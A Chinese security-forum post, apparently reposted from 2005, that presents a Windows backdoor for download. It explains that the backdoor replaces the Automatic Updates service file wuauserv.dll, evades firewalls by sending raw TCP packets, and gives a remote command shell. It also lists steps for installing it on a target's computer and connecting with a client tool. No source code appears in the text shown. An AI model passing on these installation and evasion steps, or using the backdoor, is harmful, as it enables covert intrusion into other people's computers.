名称 简介 添加时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考
详情
作者:ecawen 发表于[2017-08-06]

本文共 [1099] 位读者顶过

这个写的比较烂,用的都是过时的技术,不过像我一样的小鸟们看看源代码也许能学到点东西。这是一个通过直接收发数据包来传输数据的后门,可以在两台具有公网IP的计算机之间和局域网内相同网段的计算机之间使用。由于有的防火墙屏蔽对XX端口的连接,而对单个数据包则不予理会,因此我们可以通过自行发送TCP包(不建立连接)来欺骗防火墙。后门替换了系统中的wuauserv.dll,也就是Automatic Updates服务中的文件。安装后和每次系统启动后延时10秒以等待相关网络服务启动,然后就可以用客户端client.exe连接了。[出自:jiwo.org]
    安装:把wuaus.dll和install.bat复制到对方计算机上,执行install.bat即可。
    使用:在本地执行命令client [对方IP],然后输入TCP包的本地和对方端口(只要防火墙不屏蔽随便输,什么都行,如80,21之类),回车即可得到一个shell。
    注意:后门做的比较简单,只有CMDshell的功能,内网机器和外网机器也不能互访,必须要两台计算机能相互发送和接受数据包。这里提供了原代码,高手可以做相应改进。
                                                             G-leiz       Feb,2005
---------------------------------------------------------------------------------------------------------------
左上角导航栏那么明显的“下载”按链接你看不见,那就点这儿 下载 吧!

评论

暂无
发表评论
 返回顶部 
热度(1099)
 关注微信